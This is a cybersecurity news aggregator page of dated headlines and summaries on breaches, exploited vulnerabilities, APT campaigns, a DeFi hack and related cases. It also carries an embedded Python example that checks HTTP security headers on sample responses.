Security News
The latest cybersecurity news, collected from a wide range of security websites.
2024-09-08 01:04:58
grep Has Leaked The Heritage Foundation Database that was Breached by SiegedSec
by Dark Web Informer
2024-09-07 23:47:25
Daily Dose of Dark Web Informer - September 7th, 2024
This daily article is intended to make it easier for those who want to stay updated with my regular posts. Any subscriber-only content will be clearly marked at the end of the link.
by Dark Web Informer
2024-09-07 21:00:54
reconFTW: The Ultimate Tool for Automated Domain Reconnaissance and Vulnerability Scanning
by Dark Web Informer
2024-09-07 19:01:53
A Threat Actor Allegedly Has Leaked the Database to Indian Academy of Pediatrics
by Dark Web Informer
2024-09-07 18:11:20
Sorillus v7.2: Remote Administration Tool (RAT) Demonstration
by Dark Web Informer
2024-09-07 17:28:54
Ransomware Feed
Ransomware.live provides detailed insights into recent victims, high-profile attacks in the press, ransomware groups, negotiation chats, comprehensive statistics, victims categorized by country, and cartographic visualizations of global incidents.
by Dark Web Informer
2024-09-07 17:00:00
888 Has Allegedly Leaked the Muzu.co Database
by Dark Web Informer
2024-09-07 16:21:26
A Threat Actor is Allegedly Selling Access to an Unidentified Dutch Company
by Dark Web Informer
2024-09-07 16:19:40
U.S. CISA adds Draytek VigorConnect and Kingsoft WPS Office bugs to its Known Exploited Vulnerabilities catalog
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Draytek VigorConnect and Kingsoft WPS Office vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these vulnerabilities: At the end of August, […]
by Security Affairs
2024-09-07 15:33:10
The 6 Different Types of Hackers
by Dark Web Informer
2024-09-07 15:16:25
A Threat Actor is Allegedly Selling Singapore Citizens Leads
by Dark Web Informer
2024-09-07 14:20:33
A Threat Actor has Allegedly Leaked the Database of SmilePath Australia
by Dark Web Informer
2024-09-07 13:00:00
For security, we have to stop picking up the phone
Today's scams can be as simple as picking up a phone call. To avoid the next fraud, there are good reasons to let your calls run to voicemail.
by TechCrunch
2024-09-07 12:58:00
North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams
Threat actors affiliated with North Korea have been observed leveraging LinkedIn as a way to target developers as part of a fake job recruiting operation. These attacks employ coding tests as a common initial infection vector, Google-owned Mandiant said in a new report about threats faced by the Web3 sector. "After an initial chat conversation, the attacker sent a ZIP file that contained
by The Hacker News
2024-09-07 12:40:00
FBI Cracks Down on Dark Web Marketplace Managed by Russian and Kazakh Nationals
Two men have been indicted in the U.S. for their alleged involvement in managing a dark web marketplace called WWH Club that specializes in the sale of sensitive personal and financial information. Alex Khodyrev, a 35-year-old Kazakhstan national, and Pavel Kublitskii, a 37-year-old Russian national, have been charged with conspiracy to commit access device fraud and conspiracy to commit wire
by The Hacker News
2024-09-07 11:30:00
Hackers Threaten to Leak Planned Parenthood Data
Plus: Kaspersky's US business sold, Nigerian sextortion scammers jailed, and Europe's controversial encryption plans return.
by WIRED Security News
2024-09-07 11:13:28
A flaw in WordPress LiteSpeed Cache Plugin allows account takeover
A critical flaw in the LiteSpeed Cache plugin for WordPress could allow unauthenticated users to take control of arbitrary accounts. The LiteSpeed Cache plugin is a popular caching plugin for WordPress that accounts for over 5 million active installations. The plugin offers site acceleration through server-level caching and various optimization features. The LiteSpeed Cache plugin […]
by Security Affairs
2024-09-07 09:00:00
Data Skills Gap Is Hampering Productivity; Is Upskilling the Answer?
The data skills gap is costing businesses significant productivity, with employees losing 26 working days annually, a Multiverse report finds. Companies are prioritizing upskilling efforts to bridge this gap and improve data competency.
by ITPro Today
2024-09-07 08:45:29
North Carolina Musician Charged After Employing AI Tools And Bots to Boost Streams
The United States Attorney for the Southern District of New York announced the unsealing of a three-count criminal indictment against Michael Smith, a North Carolina musician. The indictment charged Smith with wire fraud, wire fraud conspiracy, and money laundering conspiracy for allegedly using artificial intelligence (AI) tools and thousands of bots to fraudulently stream songs billions of times to obtain more than $10 million in undeserved royalty payments.
Michael Smith Exploited AI-Generated Songs
According to the unsealed indictment, 52-year-old Michael Smith used hundreds of thousands of AI-generated songs to manipulate streaming numbers across various music streaming platforms, such as Amazon Music, Apple Music, Spotify, and YouTube Music, to continuously stream the AI-generated songs. He partnered with the CEO of an unnamed AI music company, who supplied him with thousands of tracks per month in exchange for a cut of the streaming revenue. Smith then deployed thousands of automated bot accounts to continuously stream these AI-generated songs, avoiding detection and claiming over $10 million in royalty payments. The songs were given randomly generated names and artist identities to make them appear as if they were created by real artists, rather than AI. Smith has been charged with wire fraud conspiracy, wire fraud, and money laundering conspiracy, each of which carries a maximum sentence of 20 years in prison. The case is being prosecuted by the Office's Complex Frauds and Cybercrime Unit, and the FBI has praised the work of the investigators in uncovering this sophisticated scheme.
Crackdown on Fraudulent Streaming Practices
The case against Michael Smith is part of a broader effort by authorities to combat the growing problem of fraudulent streaming practices. Earlier this year, a man in Denmark was sentenced to 18 months in prison for a similar scheme.
Music streaming platforms, such as Spotify, Apple Music, and YouTube, have also taken steps to address the issue, including changes to their royalty policies and increased efforts to detect and prevent artificial stream inflation. The music industry has seen a growing backlash, with artists signing open letters calling for the end of the predatory use of AI in the industry. The charges against Michael Smith represent a significant step in the fight against the misuse of AI technology in the music industry. As the case unfolds, it will likely have far-reaching implications, serving as a warning to those who seek to exploit the system and a call to action for the industry to address the challenges posed by the rise of AI-generated music. The outcome of this case will be closely watched as the music industry and streaming platforms navigate the complex landscape of recent technological advancements.
by The Cyber Express
2024-09-07 08:45:01
Telegram Founder Pavel Durov Hits Back Against Charges But Pledges Stricter Moderation
Pavel Durov, a Russian-born billionaire and the founder of Telegram, has issued public statements for the first time since his detention in France last month, denying claims that the messaging app functions as an 'anarchic paradise' for cybercriminal activity. Durov was arrested amid an investigation into crimes related to child sexual abuse images, drug trafficking, and fraudulent transactions associated with the app. However, he has also pledged to overhaul the platform's much-criticized moderation policies.
Pavel Durov's Detention for Telegram Related Charges
Durov, who holds French citizenship, was detained in late August amid an investigation into alleged crimes on Telegram. While he managed to avoid jail time, Durov was released on a €5 million bail and ordered to report to police twice a week while remaining in France. Durov has since then criticized the decision of the French authorities to detain him, believing that they should have approached the company with these complaints rather than charging him personally. He argues that using laws from the pre-smartphone era to charge a CEO with crimes committed by third parties on the platform is a misguided approach. Durov pointed out that Telegram has an official representative for the EU region to accept and reply to requests, and that the French authorities had access to a hot line he had helped set up. He believes that the established standard practice is to start a legal action against the service itself, rather than targeting the CEO. In a lengthy statement posted to his Telegram channel early Friday, Durov acknowledged that the platform has struggled to keep pace with its rapid growth, which has reached nearly 1 billion users, making it easier for criminals to exploit its services.
"While 99.999% of Telegram users have nothing to do with crime, the 0.001% involved in illicit activities create a bad image for the entire platform, putting the interests of our almost billion users at risk," Durov wrote.
Telegram's Principles and Moderation Efforts
Despite the criminal charges he faces, Durov defended Telegram's principles and its commitment to user privacy. He said the platform has consistently refused to comply with demands from authoritarian governments, such as when it refused to hand over encryption keys to enable surveillance in Russia, leading to a ban from the Russian government. "We are prepared to leave markets that aren't compatible with our principles, because we are not doing this for money," Durov wrote. "We are driven by the intention to bring good and defend the basic rights of people, particularly in places where these rights are violated," he added. Durov acknowledged that Telegram is not perfect and said the platform should improve its processes for handling law enforcement requests, mentioning that the platform removes millions of harmful posts and channels every day. "We've already started that process internally, and I will share more details on our progress with you very soon," he added. He has pledged to revamp the company's moderation policies, including removing features linked to illegal activity. The company has already taken steps to address these issues, including disabling new media uploads to its blogging tool Telegraph and removing its People Nearby feature. Despite the challenges, Durov expressed optimism that the recent events would ultimately strengthen Telegram and the social media industry as a whole. "I hope that the events of August will result in making Telegram — and the social networking industry as a whole — safer and stronger," he expressed.
by The Cyber Express
2024-09-06 23:48:49
Daily Dose of Dark Web Informer - September 6th, 2024
This daily article is intended to make it easier for those who want to stay updated with my regular posts. Any subscriber-only content will be clearly marked at the end of the link.
by Dark Web Informer
2024-09-06 22:42:49
Alleged Data Leak of Tourism Authority of Thailand
by Dark Web Informer
2024-09-06 22:08:06
natohub has Allegedly Leaked Data Belonging to Euraxess Europe
by Dark Web Informer
2024-09-06 22:00:58
Chinese APT Abuses VSCode to Target Government in Asia
A first in our telemetry: Chinese APT Stately Taurus uses Visual Studio Code to maintain a reverse shell in victims' environments for Southeast Asian espionage.
by Palo Alto Networks - Unit42
2024-09-06 21:48:20
Car rental company Avis discloses a data breach
Car rental giant Avis disclosed a data breach that impacted one of its business applications in August, compromising customers' personal information. Car rental company Avis notified customers impacted in an August data breach. Threat actors breached one of its business applications and gained access to some of the customers' personal information. "We discovered on August […]
by Security Affairs
2024-09-06 21:25:00
SonicWall Urges Users to Patch Critical Firewall Flaw Amid Possible Exploitation
SonicWall has revealed that a recently patched critical security flaw impacting SonicOS may have come under active exploitation, making it essential that users apply the patches as soon as possible. The vulnerability, tracked as CVE-2024-40766, carries a CVSS score of 9.3 out of a maximum of 10. "An improper access control vulnerability has been identified in the SonicWall SonicOS management
by The Hacker News
2024-09-06 21:12:07
Critical GeoServer Vulnerability Exploited in Global Malware Campaign
A critical GeoServer vulnerability (CVE-2024-36401) is being actively exploited, allowing attackers to take control of systems for malware…
by Hackread
2024-09-06 20:44:00
GeoServer Vulnerability Targeted by Hackers to Deliver Backdoors and Botnet Malware
A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk. The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances. In
by The Hacker News
2024-09-06 20:40:52
Nearly 1 million Wisconsin Medicare users had information leaked in MOVEit breach
by The Record
2024-09-06 20:33:00
GitHub Actions Vulnerable to Typosquatting, Exposing Developers to Hidden Malicious Code
Threat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages. These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com). Adversaries targeting open-source repositories across
by The Hacker News
2024-09-06 20:32:14
Phishing Attack Takes a Two-Step Approach to Leverage Legitimate Sites and Evade Detection
Analysis of a new phishing attack demonstrates how attackers may take a longer path to reach their malicious goals while staying "under the radar" of security products.
by KnowBe4
2024-09-06 20:20:55
Mitiga Cloud Managed Detection and Response (MDR) Reduces Alert Fatigue and Bolsters SecOps Resources
Learn about Mitiga's fully-managed cloud detection and response service that operates 24/7.
by Mitiga
2024-09-06 20:15:51
Hypervisor Development in Rust for Security Researchers (Part 1)
In the ever-evolving field of information security, curiosity and continuous learning drive innovation.
by SpiderLabs Blog
2024-09-06 19:48:04
Feds Warn on Russian Actors Targeting Critical Infrastructure
In the past, Putin's Unit 29155 has utilized malware like WhisperGate to target organizations, particularly those in Ukraine.
by Dark Reading
2024-09-06 19:44:38
CISA Flags ICS Bugs in Baxter, Mitsubishi Products
The vulnerabilities affect industrial control tech used across the healthcare and critical manufacturing sectors.
by Dark Reading
2024-09-06 19:25:09
Commercial Spyware Use Roars Back Despite Sanctions
Vendors of mercenary spyware tools used by nation-states to track citizens and enemies have gotten savvy about evading efforts to limit their use.
by Dark Reading
2024-09-06 19:22:59
YouTube removes Tenet Media channel over alleged ties to Russian disinformation effort
by The Record
2024-09-06 18:59:17
SonicWall warns that SonicOS bug exploited in attacks
Recently fixed access control SonicOS vulnerability, tracked as CVE-2024-40766, is potentially exploited in attacks in the wild, SonicWall warns. SonicWall warns that a recently fixed access control flaw, tracked as CVE-2024-40766 (CVSS v3 score: 9.3), in SonicOS is now potentially exploited in attacks. "An improper access control vulnerability has been identified in the SonicWall SonicOS management […]
by Security Affairs
2024-09-06 18:23:21
In latest check-in, spy agencies describe 'ramp up' in election influence
by The Record
2024-09-06 18:02:51
West Virginia law enforcement sues data broker for publishing personal information online
by The Record
2024-09-06 17:45:44
Russian dark web marketplace admins indicted after arrest in Miami
by The Record
2024-09-06 17:13:08
AI Firm's Misconfigured Server Exposed 5.3 TB of Mental Health Records
A misconfigured server from a US-based AI healthcare firm Confidant Health exposed 5.3 TB of sensitive mental health…
by Hackread
2024-09-06 16:44:40
US Gov Removing Four-Year-Degree Requirements for Cyber Jobs
The US government will remove "unnecessary degree requirements" in favor of skills-based hiring to help fill 500,000 open cybersecurity jobs.
by SecurityWeek
2024-09-06 16:43:58
TIDRONE Espionage Group Targets Taiwan's Military Drone Industry
Trend Micro has uncovered a new threat group, dubbed TIDRONE, targeting Taiwan's military and satellite industries, with a specific focus on drone manufacturers. This campaign employs advanced malware and espionage tactics, likely linked to a Chinese-speaking cyber espionage group. The TIDRONE campaign, active since early 2024, is suspected to be a supply chain attack, leveraging …
by Cyber Insider
2024-09-06 16:39:47
One million US Kaspersky customers to be migrated to this lesser-known alternative
Kaspersky customers in the US can continue their existing subscriptions with a replacement product from the company's 'trusted partner'. Here's what to know.
by ZDNET Security
2024-09-06 16:34:37
Cybersecurity Talent Shortage Prompts White House Action
The Biden administration launches an initiative to encourage careers in cybersecurity, as businesses try new tactics to get unfilled IT security roles staffed.
by Dark Reading
2024-09-06 16:34:09
Veeam patches 5 critical vulnerabilities, including unauthenticated RCE flaw
An advisory for 18 patched flaws includes one that could enable "full system takeover," researchers said.
by SC Media
2024-09-06 15:58:02
Slack: There Are Five Types of AI Users
The company's framing of AI personas offers a roadmap for nudging workers along to where managers want them to go in using new technologies.
by ITPro Today
2024-09-06 15:49:08
Transport for London staff faces systems disruptions after cyberattack
Transport for London, the city's public transportation agency, revealed today that its staff has limited access to systems and email due to measures implemented in response to a Sunday cyberattack. [...]
by BleepingComputer
2024-09-06 15:36:17
The Windows 10 clock is ticking: here are 5 ways to save your old PC in 2025 (most are free)
As many as 240 million Windows 10 PCs can't be upgraded to Windows 11. Instead of tossing your device when Windows 10 support runs out, here are five viable alternatives to save you money and avoid headaches.
by ZDNET Security
2024-09-06 15:17:19
Lowe's employees targeted in new malvertising campaign
In August, Lowe's employees were the subject of a targeted campaign using fake ads and websites.
by ThreatDown
2024-09-06 15:07:05
CISA Alert AA24-249A: Russian GRU Unit 29155 Targeting U.S. and Global Critical Infrastructure
On September 5th, 2024, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) released a joint advisory about the cyber activities of a Russian cyber unit known as GRU Unit 29155 (161st Specialist Training Center) [1]. This group, part of the Russian military, has conducted espionage, sabotage, and reputational harm campaigns against various global targets since 2020. These operations, focused on critical infrastructure, aim to destabilize regions, disrupt services, and steal sensitive information, mainly through the highly destructive malware associated with the group, such as WhisperGate.
by Picus Security
2024-09-06 15:07:00
The State of the Virtual CISO Report: MSP/MSSP Security Strategies for 2025
The 2024 State of the vCISO Report continues Cynomi's tradition of examining the growing popularity of virtual Chief Information Security Officer (vCISO) services. According to the independent survey, the demand for these services is increasing, with both providers and clients reaping the rewards. The upward trend is set to continue, with even faster growth expected in the future. However,
by The Hacker News
2024-09-06 15:05:25
Transport for London outages drag into weekend after cyberattack
In a brief update ahead of the weekend, the London transport network said it has no evidence yet that customer data was compromised.
by TechCrunch
2024-09-06 15:02:17
AI and the Green Market Revolution Will Intertwine
While AI has huge potential to mitigate the environmental crisis, the technology that powers AI has a huge impact on climate change and water resources. Learn how the futures of AI and the green market revolution are intimately linked and how they will both become invisibly embedded into our daily lives.
by ITPro Today
2024-09-06 15:02:01
Adventures in Shellcode Obfuscation! Part 12: Jigsaw
by Mike Saunders, Principal Consultant. This blog is the twelfth in a series of blogs on obfuscation techniques for hiding shellcode. You can find the rest of the […]
by Red Siege Blog
2024-09-06 15:00:29
FreeBSD Gets €686,400 to Boost Security Features
The funds from Germany's Sovereign Tech Fund will be used to integrate security features such as zero trust capabilities and tools for software bill of materials.
by Dark Reading
2024-09-06 14:51:18
New global standard aims to build security around large language models
The WDTA framework spans the lifecycle of large language models, offering guidelines to manage integration with other systems.
by ZDNET Security
2024-09-06 14:48:24
Apache patches OFBiz bypass vulnerability
Security pros say this flaw could be integrated into a botnet, so teams should patch immediately.
by SC Media
2024-09-06 14:04:32
Car rental giant Avis discloses data breach impacting customers
American car rental giant Avis disclosed a data breach after attackers breached one of its business applications last month and stole customer personal information. [...]
by BleepingComputer
2024-09-06 14:00:00
Using Transparency & Sharing to Defend Critical Infrastructure
No organization can single-handedly defend against sophisticated attacks. Governments and private sector entities need to collaborate, share information, and develop defenses against cyber threats.
by Dark Reading
2024-09-06 13:49:25
Exposed: Russian military Unit 29155 does digital sabotage, espionage
The US Department of Justice has named five Russian computer hackers as members of Unit 29155 – i.e., the 161st Specialist Training Center of the Russian General Staff Main Intelligence Directorate (GRU) – which they deem responsible for the 2022 WhisperGate wiper malware attacks on Ukrainian government organizations and critical infrastructure, and subsequently computer network operations against NATO member and ally countries. "Since early 2022, the primary focus of the cyber actors appears to be …
by Help Net Security
2024-09-06 13:10:56
Recent SonicWall Firewall Vulnerability Potentially Exploited in the Wild
SonicWall is warning customers that the recently patched critical vulnerability CVE-2024-40766 may be exploited in the wild.
by SecurityWeek
2024-09-06 13:00:47
The Good, the Bad and the Ugly in Cybersecurity – Week 36
DoJ seizes 32 Doppelgänger domains, Veeam releases fix for critical RCE flaw in backup product, and DPRK attackers exploit Chromium zero-day.
by SentinelOne
2024-09-06 13:00:00
How cyber criminals are compromising AI software supply chains
With the adoption of artificial intelligence (AI) soaring across industries and use cases, preventing AI-driven software supply chain attacks has never been more important. Recent research by SentinelOne exposed a new ransomware actor, dubbed NullBulge, which targets software supply chains by weaponizing code in open-source repositories like Hugging Face and GitHub. The group, claiming to […]
by Security Intelligence
2024-09-06 13:00:00
The NSA Has a Podcast—Here's How to Decode It
The spy agency that dared not speak its name is now the Joe Rogan of the SIGINT set. And the pod's actually worth a listen.
by WIRED Security News
2024-09-06 12:59:49
The 2024 Threat Landscape State of Play
Talos' Nick Biasini discusses the biggest shifts and trends in the threat landscape so far. We also focus on one state sponsored actor that has been particularly active this year, and talk about why defenders need to be paying closer attention to infostealers.
by Cisco Talos Blog
2024-09-06 12:47:43
In Other News: US Army Hacks Buildings, X Hiring Cybersecurity Staff, Bitcoin ATM Scams
Noteworthy stories that might have slipped under the radar: US Special Forces can hack buildings, X is hiring cybersecurity staff, and FTC warns of Bitcoin ATM scams.
by SecurityWeek
2024-09-06 12:30:38
Penpie DeFi Hack: $27 Million Stolen, Pushing Crypto Theft Over $1.2 Billion in 2024
The decentralized finance (DeFi) ecosystem has been rocked by another major security breach. Penpie, a protocol built on the Pendle platform, suffered a hack on September 3, 2024. The protocol reported that the breach resulted in the theft of approximately $27 million worth of cryptocurrency. This Penpie DeFi hack adds to the already concerning rise in crypto scams, pushing total losses for 2024 past the staggering $1.2 billion mark.
Details of the Penpie DeFi Hack
The Penpie post-mortem report sheds light on some specifics of the exploit. It reveals that the attacker leveraged a vulnerability in Penpie's reward distribution mechanism. This vulnerability allowed the attacker to deploy a malicious smart contract, categorized as an "evil market," that inflated the attacker's staking balance on the platform. By manipulating this balance, the attacker could claim a significantly larger share of rewards than intended, ultimately draining millions of dollars worth of crypto assets. Following the hack, the protocol suspended all deposits and withdrawals, effectively halting operations to prevent further losses. The team also filed complaints with both the Singapore police and the FBI. They also sent a message to the hacker promising a negotiated bounty payment in exchange for the safe return of funds. "We acknowledge your exploit of our protocol," they wrote. "Please contact us to discuss terms confidentially. No legal action will be pursued if the funds are returned. Let's find a mutually beneficial solution."
[Image: Penpie's Appeal to Hacker. Source: X]
Euler Finance Cybercriminal Lauds Penpie Hacker
Soon after the incident, reports emerged that the Penpie hacker quickly moved a significant portion of the stolen funds – around $7 million – through the crypto mixer Tornado Cash. These mixers are designed to obfuscate the origin and destination of cryptocurrency transactions, making them a popular tool for criminals seeking to launder ill-gotten gains. Following the crypto hack, another infamous Euler Finance hacker, responsible for a $195 million DeFi heist in 2023, left a message on the blockchain. The message, directed at the Penpie hacker, expressed praise for their decision not to return the stolen funds. "Good job bro. I didn't see a hack like this for a while. I'm happy you kept all the money and didn't let these bastards get back one dollar of what you took. You won, they lost. Good job," they wrote.
[Image: Cybercriminal Lauds Penpie Hacker. Source: X]
Over 9,000 Victims in August Due to Crypto Phishing Scams: Report
Unfortunately, the Penpie incident is just one in a series of major DeFi hacks in 2024. The cryptocurrency landscape continues to be plagued by cyberattacks, with the total value of stolen funds in 2024 surpassing $1.21 billion. This represents a 15.5% increase compared to the previous year, according to a report by Immunefi. The losses are spread across 154 separate incidents, with the majority occurring in the DeFi space. August 2024 was particularly alarming for crypto investors, as hackers exploited various vulnerabilities to steal millions of dollars. Two major attacks during this period resulted in the theft of approximately $238 million in Bitcoin and $55 million in Dai.
[Image: Source: Scam Sniffer Report]
Phishing scams also saw a significant surge in August, with Scam Sniffer reporting a 215% increase in stolen funds compared to the previous month. Over 9,000 victims fell prey to these scams, losing about $63 million. A single large-scale phishing attack accounted for the majority of these losses, with approximately $55 million stolen.
Regulation and the Future of DeFi
The increasing frequency of DeFi hacks has also sparked discussions surrounding potential regulations. While some advocate for a more hands-on approach from regulatory bodies, others argue that such measures may stifle innovation and the core principles of DeFi. Finding the right balance between security and innovation remains a challenge. However, it's clear that addressing security vulnerabilities will be essential for fostering long-term trust and stability in the DeFi ecosystem.
by The Cyber Express
2024-09-06 12:15:19
Microsoft Office 2024 to disable ActiveX controls by default
After Office 2024 launches in October, Microsoft will disable ActiveX controls by default in Word, Excel, PowerPoint, and Visio client apps. [...]
by BleepingComputer
2024-09-06 12:05:00
Critical Security Flaw Found in LiteSpeed Cache Plugin for WordPress
Cybersecurity researchers have discovered yet another critical security flaw in the LiteSpeed Cache plugin for WordPress that could allow unauthenticated users to take control of arbitrary accounts. The vulnerability, tracked as CVE-2024-44000 (CVSS score: 7.5), impacts versions before and including 6.4.1. It has been addressed in version 6.5.0.1. "The plugin suffers from an
by The Hacker News
2024-09-06 12:04:52
Cloud Security Assurance: Is Automation Changing the Game?We explore the opportunities and limitations of automated security assurance by taking a close look at GCP and Azure cloud reports for ISO 27001.
by ITPro Today
2024-09-06 11:56:39
HTTP security headers: An easy way to harden your web applicationsModern browsers and web servers support many HTTP headers that can greatly improve web application security to protect against clickjacking, cross-site scripting, and other common types of attacks. This post provides an overview of best-practice HTTP security headers that you should be setting in your websites and applications and shows how to use DAST to make sure you’re doing it right. The post HTTP security headers: An easy way to harden your web applications appeared first on Invicti.
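The kind of check a DAST scanner runs against each response is easy to reproduce offline on a captured header set. The following is an added example written for this page, not Invicti's code: it grades a dict of response headers against the common best-practice set (HSTS with a one-year max-age, a CSP whose script-src does not permit inline scripts without a nonce or hash, clickjacking protection via frame-ancestors or X-Frame-Options, nosniff, Referrer-Policy, and version disclosure in Server/X-Powered-By). The three sample responses are constructed for the example, not captured from any real site.

```python
import re

ONE_YEAR = 31536000  # seconds; the usual minimum for a meaningful HSTS max-age


def check_security_headers(headers):
    """Return a list of (severity, message) findings for one response's headers."""
    h = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    findings = []

    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append(("high", "Strict-Transport-Security missing"))
    else:
        m = re.search(r"max-age=(\d+)", hsts, re.I)
        if not m or int(m.group(1)) < ONE_YEAR:
            findings.append(("medium", "Strict-Transport-Security max-age shorter than one year"))

    framed_by_csp = False
    csp = h.get("content-security-policy")
    if csp is None:
        findings.append(("high", "Content-Security-Policy missing"))
    else:
        directives = {}
        for directive in csp.split(";"):
            parts = directive.split()
            if parts:
                directives[parts[0].lower()] = parts[1:]
        # script-src falls back to default-src when absent, as browsers do
        script_src = directives.get("script-src", directives.get("default-src", []))
        nonce_or_hash = any(
            s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in script_src
        )
        if "'unsafe-inline'" in script_src and not nonce_or_hash and "'strict-dynamic'" not in script_src:
            findings.append(("medium", "CSP script-src permits inline scripts without a nonce or hash"))
        if "'unsafe-eval'" in script_src:
            findings.append(("low", "CSP script-src permits eval()"))
        framed_by_csp = "frame-ancestors" in directives

    xfo = h.get("x-frame-options", "").strip().upper()
    if not framed_by_csp and xfo not in ("DENY", "SAMEORIGIN"):
        findings.append(("medium", "No clickjacking protection (frame-ancestors or X-Frame-Options)"))

    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append(("low", "X-Content-Type-Options: nosniff missing"))
    if "referrer-policy" not in h:
        findings.append(("low", "Referrer-Policy missing"))

    for name in ("server", "x-powered-by"):
        if name in h and re.search(r"\d", h[name]):
            findings.append(("info", f"{name} discloses a version string: {h[name]}"))
    return findings


# Constructed sample responses (not captured from a real server).
WEAK_RESPONSE = {
    "Server": "Apache/2.4.41",
    "X-Powered-By": "PHP/7.4.3",
    "Content-Type": "text/html; charset=utf-8",
}
PARTIAL_RESPONSE = {
    "Strict-Transport-Security": "max-age=86400",
    "Content-Security-Policy": "default-src 'self'; script-src 'self' 'unsafe-inline'",
    "X-Frame-Options": "sameorigin",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "no-referrer",
}
HARDENED_RESPONSE = {
    "Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload",
    "Content-Security-Policy": "default-src 'self'; script-src 'self' 'nonce-r4nd0m'; "
                               "object-src 'none'; frame-ancestors 'none'; base-uri 'self'",
    "X-Content-Type-Options": "nosniff",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Permissions-Policy": "camera=(), microphone=(), geolocation=()",
}

if __name__ == "__main__":
    for label, resp in (("weak", WEAK_RESPONSE), ("partial", PARTIAL_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, check_security_headers(resp) or "OK")
```

The CSP logic mirrors browser behaviour on one point worth knowing: 'unsafe-inline' is ignored once a nonce or hash source is present, so a policy that lists both as a fallback for old browsers is not flagged. A real scan feeds the headers from a live response into the same function.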
by Invicti
2024-09-06 11:55:29
Gen Alpha: Navigating Cybersecurity in an AI-Native WorldIn 2020, according to population estimates from the U.S. Census Bureau, millennials surpassed Baby Boomers as the nation’s largest living adult generation. Millennials were heralded as digital natives, the first generation to grow up immersed in the digital world of the internet, smartphones, and social media. This has fundamentally shaped their communication, work habits, and lifestyles […] The post Gen Alpha: Navigating Cybersecurity in an AI-Native World appeared first on IT Security Guru.
by IT Security Guru
2024-09-06 11:50:06
Apache Makes Another Attempt at Patching Exploited RCE in OFBizThe latest Apache OFBiz update patches CVE-2024-45195, a bypass of a recently disclosed remote code execution bug exploited in attacks. The post Apache Makes Another Attempt at Patching Exploited RCE in OFBiz appeared first on SecurityWeek.
by SecurityWeek
2024-09-06 11:43:06
New Android Malware SpyAgent Targets Crypto Wallets with Image RecognitionA newly discovered Android malware named ‘SpyAgent’ is stealing sensitive cryptocurrency credentials using advanced image recognition technology. The malware, discovered by McAfee’s Mobile Research Team, targets mnemonic keys used to recover crypto wallets by scanning images on infected devices. These 12-word phrases serve as a more user-friendly alternative to traditional, complex private keys, making their … The post New Android Malware SpyAgent Targets Crypto Wallets with Image Recognition appeared first on CyberInsider.
by Cyber Insider
2024-09-06 11:37:41
The complete list of Q2 2024 releases and updates on HTB Enterprise PlatformResponding to the feedback we’ve received from our 2.9 million community of cybersecurity professionals, we’re excited to share the new Hack The Box updates released over the past 3 months.
by Hack The Box Blog
2024-09-06 11:37:07
Feds warn of broad Russia-linked CVE exploits targeting critical infrastructureAttackers operating under the direction of Russia’s military intelligence service are targeting governments, finance, transportation, energy and healthcare.
by Cybersecurity Dive
2024-09-06 11:28:01
Cybersecurity M&A Roundup: 36 Deals Announced in August 2024Roundup of the three dozen cybersecurity-related merger and acquisition (M&A) deals announced in August 2024. The post Cybersecurity M&A Roundup: 36 Deals Announced in August 2024 appeared first on SecurityWeek.
by SecurityWeek
2024-09-06 11:17:29
SpyAgent Android malware steals your crypto recovery phrases from imagesA new Android malware named SpyAgent uses optical character recognition (OCR) technology to steal cryptocurrency wallet recovery phrases from screenshots stored on the mobile device. [...]
by BleepingComputer
2024-09-06 11:16:38
Gamaredon APT Launches Spear-Phishing Campaign Targeting Ukrainian MilitaryA sophisticated spear-phishing campaign orchestrated by the Gamaredon APT group has emerged as a threat to Ukrainian military personnel. Cyble Research and Intelligence Labs (CRIL) has revealed this extensive operation, which capitalizes on spear-phishing emails to compromise sensitive military systems. Gamaredon, also known as Primitive Bear or Armageddon, is a Russian-affiliated advanced persistent threat (APT) group with a long history of targeting Ukrainian government institutions and critical infrastructure. Active since at least 2013, Gamaredon has been notorious for its cyber-espionage activities. Despite the relatively low sophistication of its tools, the group’s persistent focus on specific geopolitical targets has led to numerous successful attacks. An Overview of the Gamaredon Campaign The latest campaign by Gamaredon reflects an escalation in its tactics and scope. CRIL’s recent analysis reveals that the group is employing spear-phishing emails to deliver malicious payloads aimed at Ukrainian military personnel, in a clear pattern of coordinated and large-scale attacks. (Image: Gamaredon sample observed in the wild. Source: Cyble) The spear-phishing emails at the heart of this campaign are designed to deceive recipients into executing malicious files. The emails are themed around military summons, with subjects such as “ПОВІСТКА” (Ukrainian for “summons”). Each email contains a malicious XHTML attachment crafted to initiate a series of damaging actions when opened. Upon activation, the XHTML file executes obfuscated JavaScript code. This script, hidden within a div element with an id set to “jwu,” uses Base64 encoding and random characters to obscure its true intent.
